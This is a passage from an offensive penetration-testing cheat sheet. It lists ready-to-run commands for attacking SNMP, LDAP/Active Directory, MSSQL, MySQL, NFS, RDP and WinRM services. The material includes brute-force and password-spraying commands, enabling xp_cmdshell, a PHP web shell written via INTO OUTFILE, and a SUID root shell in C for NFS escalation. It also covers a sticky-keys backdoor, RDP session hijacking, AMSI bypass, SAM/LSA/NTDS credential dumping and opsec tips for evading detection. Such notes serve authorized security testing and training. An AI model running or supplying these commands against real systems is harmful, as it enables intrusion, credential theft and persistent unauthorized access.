braa public@$TARGET_IP:.1.3.6.*

# === SNMPBULKWALK (FASTER FOR v2c) ===

# Bulk walk (faster than regular walk)
snmpbulkwalk -v2c -c public $TARGET_IP | tee snmpbulkwalk.txt

# === USEFUL OIDs ===

# System information
# 1.3.6.1.2.1.1.1.0 - System description
# 1.3.6.1.2.1.1.5.0 - Hostname
# 1.3.6.1.2.1.1.3.0 - Uptime
# 1.3.6.1.2.1.1.4.0 - Contact info
# 1.3.6.1.2.1.1.6.0 - Location

# Network information
# 1.3.6.1.2.1.4.20.1.1 - IP addresses
# 1.3.6.1.2.1.4.21.1.1 - Routing table
# 1.3.6.1.2.1.6.13.1.3 - TCP local ports

# Windows-specific
# 1.3.6.1.4.1.77.1.2.25 - User accounts
# 1.3.6.1.2.1.25.4.2.1.2 - Running processes
# 1.3.6.1.2.1.25.6.3.1.2 - Installed software

# === SNMPV3 ENUMERATION ===

# SNMPv3 user enumeration (if misconfigured)
sudo nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/snmp.txt $TARGET_IP

# Manual SNMPv3 query
snmpget -v3 -u username -l authNoPriv -a MD5 -A authpassword $TARGET_IP 1.3.6.1.2.1.1.1.0

# === METASPLOIT SNMP MODULES ===

# msfconsole
# use auxiliary/scanner/snmp/snmp_login
# use auxiliary/scanner/snmp/snmp_enum
# use auxiliary/scanner/snmp/snmp_enumshares
# use auxiliary/scanner/snmp/snmp_enumusers

# === BASIC ENUMERATION ===

# Anonymous bind check
ldapsearch -x -h $TARGET_IP -s base namingcontexts
ldapsearch -x -h $TARGET_IP -s base -b "" "(objectClass=*)" "*" +

# Get domain naming context
ldapsearch -x -h $TARGET_IP -s base namingcontexts | grep -i namingcontexts

# Get domain functional level
ldapsearch -x -h $TARGET_IP -s base -b "" "(objectClass=*)" domainFunctionality

# NetExec LDAP (anonymous)
nxc ldap $TARGET_IP -u '' -p ''
nxc ldap $TARGET_IP -u '' -p '' --users
nxc ldap $TARGET_IP -u '' -p '' --groups

# === AUTHENTICATED ENUMERATION ===

# With credentials (basic auth)
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password -b "DC=domain,DC=com"

# With credentials (extract all users)
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName userPrincipalName description memberOf \
  | tee ldap_users.txt

# Extract all groups
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(objectClass=group)" cn member \
  | tee ldap_groups.txt

# Extract computers
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(objectClass=computer)" dNSHostName operatingSystem \
  | tee ldap_computers.txt

# Extract domain admins
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=com))" sAMAccountName

# Extract user attributes (useful info)
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(objectClass=user)" \
  sAMAccountName mail userPrincipalName displayName description memberOf servicePrincipalName

# Extract SPNs (Kerberoasting targets)
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName | tee ldap_spns.txt

# Extract users with "Do not require Kerberos preauthentication" (ASREPRoast targets)
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
  sAMAccountName | tee ldap_asreproastable.txt

# Extract users with passwords that don't expire
ldapsearch -x -h $TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" \
  sAMAccountName

# === NETEXEC LDAP (COMPREHENSIVE) ===

# NetExec with credentials
nxc ldap $TARGET_IP -u user -p password --users
nxc ldap $TARGET_IP -u user -p password --groups
nxc ldap $TARGET_IP -u user -p password --computers
nxc ldap $TARGET_IP -u user -p password --pass-pol

# Domain password policy
nxc ldap $TARGET_IP -u user -p password -M get-desc-users
nxc ldap $TARGET_IP -u user -p password --asreproast asrep_hashes.txt
nxc ldap $TARGET_IP -u user -p password --kerberoasting kerb_hashes.txt

# Bloodhound data collection via NetExec
nxc ldap $TARGET_IP -u user -p password --bloodhound --collection All

# === LDAPS (ENCRYPTED LDAP - PORT 636) ===

# LDAPS connection
ldapsearch -x -H ldaps://$TARGET_IP -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName

# Test LDAPS certificate
openssl s_client -connect $TARGET_IP:636 -showcerts

# === LDAP GLOBAL CATALOG (PORTS 3268, 3269) ===

# Query Global Catalog (port 3268)
ldapsearch -x -h $TARGET_IP -p 3268 -D "CN=user,DC=domain,DC=com" -w password \
  -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName

# === WINDAPSEARCH (DOMAIN ENUMERATION) ===

# windapsearch (Python LDAP enumeration tool)
python3 windapsearch.py --dc-ip $TARGET_IP -u user@domain.com -p password --da
python3 windapsearch.py --dc-ip $TARGET_IP -u user@domain.com -p password --privileged-users
python3 windapsearch.py --dc-ip $TARGET_IP -u user@domain.com -p password --unconstrained

# === LDAPDOMAINDUMP ===

# ldapdomaindump (creates HTML reports)
ldapdomaindump -u 'DOMAIN\user' -p password $TARGET_IP -o ldap_dump/

# === NMAP LDAP SCRIPTS ===

# Nmap LDAP enumeration
sudo nmap -p 389,636,3268,3269 --script ldap-rootdse,ldap-search $TARGET_IP -oN ldap_nmap.txt
sudo nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=domain,dc=com"' $TARGET_IP

# === USEFUL LDAP FILTERS ===

# All users
# (objectClass=user)
# All groups
# (objectClass=group)
# Domain admins
# (memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=com)
# Users with SPN (Kerberoasting)
# (&(objectClass=user)(servicePrincipalName=*))
# ASREPRoastable users
# (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
# Enabled users
# (&(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))
# Disabled users
# (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))
# Computers
# (objectClass=computer)
# Domain controllers
# (userAccountControl:1.2.840.113556.1.4.803:=8192)

# === BASIC ENUMERATION ===

# Nmap MSSQL info
sudo nmap -p 1433 --script ms-sql-info,ms-sql-ntlm-info $TARGET_IP -oN mssql_info.txt

# Nmap MSSQL brute force
sudo nmap -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt $TARGET_IP

# NetExec MSSQL
nxc mssql $TARGET_IP -u '' -p ''
nxc mssql $TARGET_IP -u sa -p passwords.txt
nxc mssql $TARGET_IP -u users.txt -p 'Password123!' --continue-on-success

# Hydra brute force
hydra -l sa -P /usr/share/wordlists/rockyou.txt mssql://$TARGET_IP -t 4 -V

# Medusa brute force
medusa -h $TARGET_IP -u sa -P passwords.txt -M mssql -t 4

# === AUTHENTICATED ENUMERATION ===

# NetExec with credentials
nxc mssql $TARGET_IP -u user -p password
nxc mssql $TARGET_IP -u user -p password -d domain
nxc mssql $TARGET_IP -u user -p password --local-auth

# List databases
nxc mssql $TARGET_IP -u user -p password -q "SELECT name FROM master.sys.databases"

# List tables in a database
nxc mssql $TARGET_IP -u user -p password -q "SELECT table_name FROM dbname.information_schema.tables"

# Query execution
nxc mssql $TARGET_IP -u user -p password -q "SELECT @@version"

# === IMPACKET MSSQLCLIENT ===

# Connect with mssqlclient.py
impacket-mssqlclient domain/user:password@$TARGET_IP
impacket-mssqlclient user:password@$TARGET_IP -windows-auth

# Connect with hash (Pass-the-Hash)
impacket-mssqlclient -hashes :ntlm_hash domain/user@$TARGET_IP

# === COMMAND EXECUTION ===

# NetExec command execution (xp_cmdshell)
nxc mssql $TARGET_IP -u user -p password -x "whoami"
nxc mssql $TARGET_IP -u user -p password -x "powershell -enc <base64>"

# Enable xp_cmdshell via Impacket
# SQL> EXEC sp_configure 'show advanced options', 1;
# SQL> RECONFIGURE;
# SQL> EXEC sp_configure 'xp_cmdshell', 1;
# SQL> RECONFIGURE;
# SQL> xp_cmdshell 'whoami';

# === PRIVILEGE ESCALATION CHECKS ===

# Check if current user is sysadmin
nxc mssql $TARGET_IP -u user -p password -q "SELECT IS_SRVROLEMEMBER('sysadmin')"

# Check impersonation privileges
nxc mssql $TARGET_IP -u user -p password -q "SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'"

# List linked servers
nxc mssql $TARGET_IP -u user -p password -q "EXEC sp_linkedservers"

# === MSSQL HASHES DUMPING ===

# Dump MSSQL hashes (requires sysadmin)
nxc mssql $TARGET_IP -u user -p password --sam
nxc mssql $TARGET_IP -u user -p password --lsa

# === METASPLOIT MSSQL MODULES ===

# msfconsole
# use auxiliary/scanner/mssql/mssql_login
# use auxiliary/scanner/mssql/mssql_enum
# use auxiliary/admin/mssql/mssql_exec
# use auxiliary/admin/mssql/mssql_enum_sql_logins
# use exploit/windows/mssql/mssql_payload (if xp_cmdshell is enabled)

# === SQSH (ALTERNATIVE CLIENT) ===

# Connect with sqsh
sqsh -S $TARGET_IP -U sa -P password
sqsh -S $TARGET_IP -U 'DOMAIN\user' -P password

# === USEFUL SQL QUERIES ===

# Current user
# SELECT SYSTEM_USER;
# Current database
# SELECT DB_NAME();
# List all databases
# SELECT name FROM master.sys.databases;
# List all tables
# SELECT * FROM information_schema.tables;
# List users
# SELECT name FROM master.sys.syslogins;
# Check sysadmin
# SELECT IS_SRVROLEMEMBER('sysadmin');

# === BASIC ENUMERATION ===

# Nmap MySQL enumeration
sudo nmap -p 3306 --script mysql-info,mysql-databases,mysql-users $TARGET_IP -oN mysql_info.txt

# Nmap MySQL brute force
sudo nmap -p 3306 --script mysql-brute --script-args userdb=users.txt,passdb=passwords.txt $TARGET_IP

# NetExec MySQL (if available)
nxc mysql $TARGET_IP -u root -p passwords.txt

# Hydra brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://$TARGET_IP -t 4 -V

# Medusa brute force
medusa -h $TARGET_IP -u root -P passwords.txt -M mysql -t 4

# === CONNECTION ===

# Connect to MySQL
mysql -h $TARGET_IP -u root -p
mysql -h $TARGET_IP -u root -p password

# Connect to specific database
mysql -h $TARGET_IP -u root -p password -D database_name

# === AUTHENTICATED ENUMERATION ===

# Show databases
# SHOW DATABASES;

# Select database
# USE database_name;

# Show tables
# SHOW TABLES;

# Describe table
# DESCRIBE table_name;

# Show users
# SELECT User, Host FROM mysql.user;

# Show user privileges
# SHOW GRANTS FOR 'user'@'host';

# Current user
# SELECT USER();
# SELECT CURRENT_USER();

# MySQL version
# SELECT VERSION();

# === FILE OPERATIONS ===

# Read file (requires FILE privilege)
# SELECT LOAD_FILE('/etc/passwd');

# Write file (requires FILE privilege and secure_file_priv disabled)
# SELECT 'test' INTO OUTFILE '/var/www/html/shell.php';
# SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

# Check secure_file_priv setting
# SHOW VARIABLES LIKE 'secure_file_priv';

# === USER DEFINED FUNCTIONS (UDF) ===

# Check for plugin directory
# SHOW VARIABLES LIKE 'plugin_dir';

# Create UDF for command execution (advanced)
# Requires compiling shared library and loading it

# === HASHES DUMPING ===

# Dump MySQL user hashes
# SELECT user, authentication_string FROM mysql.user;

# MySQL hash cracking
# hashcat -m 300 mysql_hashes.txt /usr/share/wordlists/rockyou.txt  # MySQL4.1/MySQL5
# john mysql_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# === METASPLOIT MYSQL MODULES ===

# msfconsole
# use auxiliary/scanner/mysql/mysql_login
# use auxiliary/scanner/mysql/mysql_version
# use auxiliary/scanner/mysql/mysql_hashdump
# use auxiliary/admin/mysql/mysql_enum
# use auxiliary/admin/mysql/mysql_sql (execute queries)

# === MYSQLDUMP (BACKUP EXTRACTION) ===

# Dump entire database
mysqldump -h $TARGET_IP -u root -p database_name > database_dump.sql

# Dump all databases
mysqldump -h $TARGET_IP -u root -p --all-databases > all_databases.sql

# === USEFUL SQL QUERIES ===

# Database version
# SELECT @@version;

# Current database
# SELECT DATABASE();

# List all databases
# SELECT schema_name FROM information_schema.schemata;

# List all tables in database
# SELECT table_name FROM information_schema.tables WHERE table_schema='database_name';

# List columns in table
# SELECT column_name FROM information_schema.columns WHERE table_name='table_name';

# Check if running as root
# SELECT USER();
# \! whoami  (only works if running with system command privileges)

# === BASIC ENUMERATION ===

# Show NFS exports
showmount -e $TARGET_IP

# Nmap NFS enumeration
sudo nmap -p 111,2049 --script nfs-ls,nfs-statfs,nfs-showmount $TARGET_IP -oN nfs_enum.txt

# RPC info (NFS uses RPC)
rpcinfo -p $TARGET_IP
sudo nmap -p 111 --script rpcinfo $TARGET_IP

# === MOUNTING NFS SHARES ===

# Create mount point
sudo mkdir -p /mnt/nfs

# Mount NFS share (NFSv3)
sudo mount -t nfs $TARGET_IP:/exported/path /mnt/nfs -o nolock

# Mount with specific NFS version
sudo mount -t nfs -o vers=3,nolock $TARGET_IP:/exported/path /mnt/nfs
sudo mount -t nfs -o vers=4,nolock $TARGET_IP:/exported/path /mnt/nfs

# Mount as specific user (UID manipulation)
sudo mount -t nfs $TARGET_IP:/exported/path /mnt/nfs -o nolock,rw,uid=1000,gid=1000

# List mounted shares
mount | grep nfs
df -h

# Unmount
sudo umount /mnt/nfs

# Force unmount if busy
sudo umount -f /mnt/nfs
sudo umount -l /mnt/nfs  # Lazy unmount

# === PRIVILEGE ESCALATION VIA NFS ===

# NFS no_root_squash exploitation
# If no_root_squash is enabled, root on client = root on server

# 1. Mount the share
sudo mount -t nfs $TARGET_IP:/shared /mnt/nfs

# 2. Create SUID binary as root
sudo cp /bin/bash /mnt/nfs/bash_shell
sudo chmod +s /mnt/nfs/bash_shell

# 3. On target system, execute the SUID binary
# ./bash_shell -p

# Alternative: Create malicious executable
cat > shell.c << 'EOF'
#include <stdio.h>
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
EOF

# Compile and set SUID
gcc shell.c -o shell
sudo cp shell /mnt/nfs/
sudo chmod +s /mnt/nfs/shell

# === UID/GID MANIPULATION ===

# If you know the UID/GID of a privileged user on the NFS server
# Create a user with that UID on your machine

# Add user with specific UID
sudo useradd -u 1337 nfsuser
sudo su - nfsuser

# Now mount and access files as that user
mount -t nfs $TARGET_IP:/home /mnt/nfs
cd /mnt/nfs

# === NFS ENUMERATION WITH NMAP ===

# Comprehensive NFS scripts
sudo nmap -p 111,2049 --script nfs-* $TARGET_IP -oN nfs_full_enum.txt

# Check for NFS version
sudo nmap -p 2049 --script nfs-ls --script-args nfs.version=3 $TARGET_IP

# === NFSSHELL (INTERACTIVE NFS CLIENT) ===

# nfsshell (if available)
# nfsshell $TARGET_IP
# export
# mount /exported/path
# ls
# get file.txt

# === METASPLOIT NFS MODULES ===

# msfconsole
# use auxiliary/scanner/nfs/nfsmount
# set RHOSTS $TARGET_IP
# run

# === EXTRACTING FILES ===

# Once mounted, browse and extract files
cd /mnt/nfs
find . -type f -name "*.txt" -o -name "*.conf" -o -name "*.key"
find . -type f -exec grep -l "password" {} \;

# Copy entire share
rsync -av /mnt/nfs/ ./nfs_backup/

# === CHECKING NFS SECURITY ===

# Check for no_root_squash (vulnerable configuration)
cat /etc/exports  # On NFS server
# Look for: /shared *(rw,no_root_squash,no_subtree_check)

# Check mount options from client side
mount | grep nfs

# === BASIC ENUMERATION ===

# Nmap RDP enumeration
sudo nmap -p 3389 --script rdp-enum-encryption,rdp-ntlm-info $TARGET_IP -oN rdp_enum.txt

# Check RDP security settings
sudo nmap -p 3389 --script rdp-vuln-ms12-020 $TARGET_IP

# NetExec RDP
nxc rdp $TARGET_IP
nxc rdp $TARGET_IP -u '' -p ''

# === SCREENSHOT/INFORMATION GATHERING ===

# RDP screenshot (no authentication needed)
nmap -p 3389 --script rdp-screenshot $TARGET_IP
# Output saved as rdp-screenshot-<target>.png

# === BRUTE FORCING ===

# Hydra RDP brute force
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$TARGET_IP -t 4 -V

# NetExec RDP brute force
nxc rdp $TARGET_IP -u administrator -p passwords.txt
nxc rdp $TARGET_IP -u users.txt -p 'Password123!' --continue-on-success

# Password spraying (opsec: avoid account lockouts)
nxc rdp $TARGET_IP -u users.txt -p 'Winter2024!' --continue-on-success

# === CONNECTING TO RDP ===

# xfreerdp (recommended)
xfreerdp /v:$TARGET_IP /u:username /p:password /cert:ignore /dynamic-resolution +clipboard

# With domain
xfreerdp /v:$TARGET_IP /u:username /p:password /d:DOMAIN /cert:ignore /dynamic-resolution +clipboard

# Pass-the-Hash with xfreerdp (requires Restricted Admin mode)
xfreerdp /v:$TARGET_IP /u:administrator /pth:ntlm_hash /cert:ignore

# Drive redirection (share local folder)
xfreerdp /v:$TARGET_IP /u:username /p:password /drive:share,/tmp /cert:ignore

# Full screen mode
xfreerdp /v:$TARGET_IP /u:username /p:password /f /cert:ignore

# Network Level Authentication (NLA) bypass attempt
xfreerdp /v:$TARGET_IP /u:username /p:password /sec:rdp /cert:ignore

# Rdesktop (legacy alternative)
rdesktop -u username -p password $TARGET_IP
rdesktop -u username -p password -d DOMAIN $TARGET_IP -g 1280x720

# === RESTRICTED ADMIN MODE CHECK ===

# Check if Restricted Admin mode is enabled (allows PTH)
nxc rdp $TARGET_IP -u username -p password --check-admin

# NetExec Pass-the-Hash (requires Restricted Admin)
nxc rdp $TARGET_IP -u administrator -H ntlm_hash

# === RDP SESSION HIJACKING ===

# If you have SYSTEM access on an RDP server, you can hijack sessions
# List sessions
query user

# Hijack session (from SYSTEM context)
tscon <session_id> /dest:<current_session_name>

# From SYSTEM shell, hijack without password
# sc.exe create SessionHijack binpath= "cmd.exe /c tscon 2 /dest:rdp-tcp#0"
# net start SessionHijack

# === BLUEKEEP (CVE-2019-0708) ===

# Check for BlueKeep vulnerability
sudo nmap -p 3389 --script rdp-vuln-ms12-020 $TARGET_IP
nxc rdp $TARGET_IP -u '' -p '' -M rdp-bluekeep

# Metasploit BlueKeep exploit (use with caution - can crash systems)
# msfconsole
# use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# set RHOSTS $TARGET_IP
# check (to verify vulnerability)

# === STICKY KEYS BACKDOOR (IF YOU HAVE ACCESS) ===

# Replace sethc.exe with cmd.exe for backdoor
# Requires prior access to replace system files
# Press Shift 5 times at RDP login to get SYSTEM shell

# From compromised system with admin:
# takeown /f C:\Windows\System32\sethc.exe
# icacls C:\Windows\System32\sethc.exe /grant administrators:F
# copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

# === RDP THROUGH SSH TUNNEL ===

# Create SSH tunnel to access RDP
ssh -L 3389:$TARGET_IP:3389 user@jump_host

# Connect to localhost
xfreerdp /v:127.0.0.1 /u:username /p:password /cert:ignore

# === METASPLOIT RDP MODULES ===

# msfconsole
# use auxiliary/scanner/rdp/rdp_scanner
# use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
# use post/windows/gather/credentials/mstsc (extract saved RDP credentials)

# === BASIC ENUMERATION ===

# Nmap WinRM detection
sudo nmap -p 5985,5986 --script http-title $TARGET_IP -oN winrm_detect.txt

# NetExec WinRM detection
nxc winrm $TARGET_IP
nxc winrm $TARGET_IP -u '' -p ''

# Check if WinRM is responding
curl -i http://$TARGET_IP:5985/wsman

# === BRUTE FORCING ===

# NetExec WinRM brute force
nxc winrm $TARGET_IP -u administrator -p passwords.txt
nxc winrm $TARGET_IP -u users.txt -p 'Password123!' --continue-on-success

# Hydra WinRM brute force
hydra -l administrator -P /usr/share/wordlists/rockyou.txt winrm://$TARGET_IP -t 4 -V

# Password spraying (opsec: single password, multiple users)
nxc winrm $TARGET_IP -u users.txt -p 'Winter2024!' --continue-on-success

# === COMMAND EXECUTION ===

# NetExec command execution
nxc winrm $TARGET_IP -u username -p password -x "whoami"
nxc winrm $TARGET_IP -u username -p password -x "ipconfig"
nxc winrm $TARGET_IP -u username -p password -X '$PSVersionTable'  # PowerShell

# NetExec with domain
nxc winrm $TARGET_IP -u username -p password -d DOMAIN -x "whoami"

# Pass-the-Hash with NetExec
nxc winrm $TARGET_IP -u administrator -H ntlm_hash -x "whoami"

# === EVIL-WINRM (INTERACTIVE SHELL) ===

# Evil-WinRM connection
evil-winrm -i $TARGET_IP -u username -p password

# With domain
evil-winrm -i $TARGET_IP -u username -p password -d DOMAIN

# Pass-the-Hash
evil-winrm -i $TARGET_IP -u administrator -H ntlm_hash

# With SSL (port 5986)
evil-winrm -i $TARGET_IP -u username -p password -S

# Evil-WinRM useful commands (once connected):
# upload /local/file.txt
# download C:\remote\file.txt
# menu (show available commands)
# Bypass-4MSI (disable AMSI)
# Invoke-Binary /path/to/binary.exe

# === POWERSHELL REMOTING ===

# From Windows attacker machine
# Enter-PSSession -ComputerName $TARGET_IP -Credential (Get-Credential)

# Execute command remotely
# Invoke-Command -ComputerName $TARGET_IP -Credential $cred -ScriptBlock { whoami }

# === WINRM WITH RUBY ===

# WinRS (if available)
winrs -r:http://$TARGET_IP:5985 -u:username -p:password whoami
winrs -r:http://$TARGET_IP:5985 -u:username -p:password cmd

# === METASPLOIT WINRM MODULES ===

# msfconsole
# use exploit/windows/winrm/winrm_script_exec
# set RHOSTS $TARGET_IP
# set USERNAME username
# set PASSWORD password
# set FORCE_VBS true
# run

# === LATERAL MOVEMENT ===

# NetExec lateral movement check
nxc winrm $TARGET_NETWORK -u administrator -p password --local-auth
nxc winrm $TARGET_NETWORK -u administrator -H ntlm_hash

# Check admin access
nxc winrm $TARGET_IP -u username -p password --local-auth --check-admin

# === DUMP CREDENTIALS ===

# NetExec credential dumping via WinRM
nxc winrm $TARGET_IP -u administrator -p password --sam
nxc winrm $TARGET_IP -u administrator -p password --lsa
nxc winrm $TARGET_IP -u administrator -p password --ntds

# === KERBEROS AUTHENTICATION ===

# Evil-WinRM with Kerberos (requires ticket)
evil-winrm -i $TARGET_IP -r DOMAIN -c /path/to/user.ccache

# === FILE TRANSFER VIA WINRM ===

# Using Evil-WinRM
# Once connected:
# upload /local/path/file.exe C:\Windows\Temp\file.exe
# download C:\Users\user\Desktop\passwords.txt /local/path/

# Using NetExec
nxc winrm $TARGET_IP -u username -p password --put-file /local/file.txt C:\\Temp\\file.txt
nxc winrm $TARGET_IP -u username -p password --get-file C:\\Windows\\System32\\license.rtf /tmp/license.rtf

# === PERSISTENCE VIA WINRM ===

# Enable WinRM remotely (if you have access)
# Get-Service WinRM
# Start-Service WinRM
# Enable-PSRemoting -Force
# Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force

# === OPSEC CONSIDERATIONS ===

# WinRM creates event logs (4648, 4624, 4672)
# Use local accounts when possible to avoid domain-wide detection
# Consider using Pass-the-Hash to avoid cleartext credentials

# Check current WinRM configuration (from target)
# winrm get winrm/config
# Get-Item WSMan:\localhost\Service\Auth\*